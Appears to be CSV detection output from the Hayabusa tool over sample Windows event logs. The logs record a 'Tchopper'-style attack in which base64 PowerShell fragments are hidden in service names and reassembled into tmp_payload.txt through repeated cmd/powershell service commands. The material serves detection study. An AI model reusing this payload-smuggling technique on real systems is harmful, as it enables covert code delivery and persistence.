+2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
